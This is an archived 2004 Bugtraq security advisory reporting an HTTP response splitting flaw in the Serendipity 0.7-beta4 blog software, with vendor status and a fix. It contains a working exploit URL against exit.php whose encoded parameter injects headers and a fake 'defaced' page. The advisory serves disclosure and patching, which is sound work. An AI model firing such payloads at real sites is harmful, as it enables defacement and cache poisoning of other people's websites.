HTTP Response Splitting in Serendipity 0.7-beta4

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: HTTP Response Splitting in Serendipity 0.7-beta4
From: "Chaotic Evil" <chaoticevil@xxxxxxxxxxx>
Date: Thu, 21 Oct 2004 13:41:50 -0500
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

SECURITY ADVISORY: HTTP Response Splitting in
Serendipity 0.7-beta4

AUTHOR: Chaotic Evil (chaoticevil $$$at$$$ spyring 
$$$dot$$$ com)

DATE: October 21st, 2004

PRODUCT: Serendipity 0.7-beta4 [October 14th, 2004 
(Recommended release, most stable)] - www.s9y.org

FROM THE VENDOR WEBSITE:
Serendipity is a weblog/blog system, implemented with 
PHP. It is standards compliant, feature rich and open 
source (BSD License).

SECURITY VULNERABILITY
HTTP Response Splitting [1].

EXPLOIT:
(observe that the url parameter is Base64-encoded, then 
URL-encoded)

http://SERVER/serendipity/exit.php?url=DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb
250ZW50LUxlbmd0aDogMA0KDQpIVFRQLzEuMCAyMDAgT0sNCkNvbnRlbnQtTGVuZ3RoOiAyMQ0KQ
29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCg0KPGh0bWw%2bKmRlZmFjZWQqPC9odG1sPg%3d%3d

VENDOR STATUS: Vendor contacted October 14th. Vendor 
worked closely with the author and promptly produced a 
fix (see below).

FIX: Use version 0.7rc1 (downloadable at 
http://www.s9y.org/12.html)

REFERENCES:
[1] "'Divide and Conquer' - HTTP Response Splitting, Web 
Cache Poisoning attacks, and Related Topics" by Amit 
Klein, dated March 4th, 2004
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pd
f


_____________________________________________
Free email with personality! Over 200 domains!
http://www.MyOwnEmail.com

Prev by Date: MDKSA-2004:110 - Updated gaim packages fix vulnerabilities
Next by Date: Re: IBM Lotus Notes/Domino fails to encode Square Brackets ( [ ] ) in computed field/text, allowing XSS (Risk increased)
Previous by thread: MDKSA-2004:110 - Updated gaim packages fix vulnerabilities
Next by thread: Re: IBM Lotus Notes/Domino fails to encode Square Brackets ( [ ] ) in computed field/text, allowing XSS (Risk increased)
Index(es):
- Date
- Thread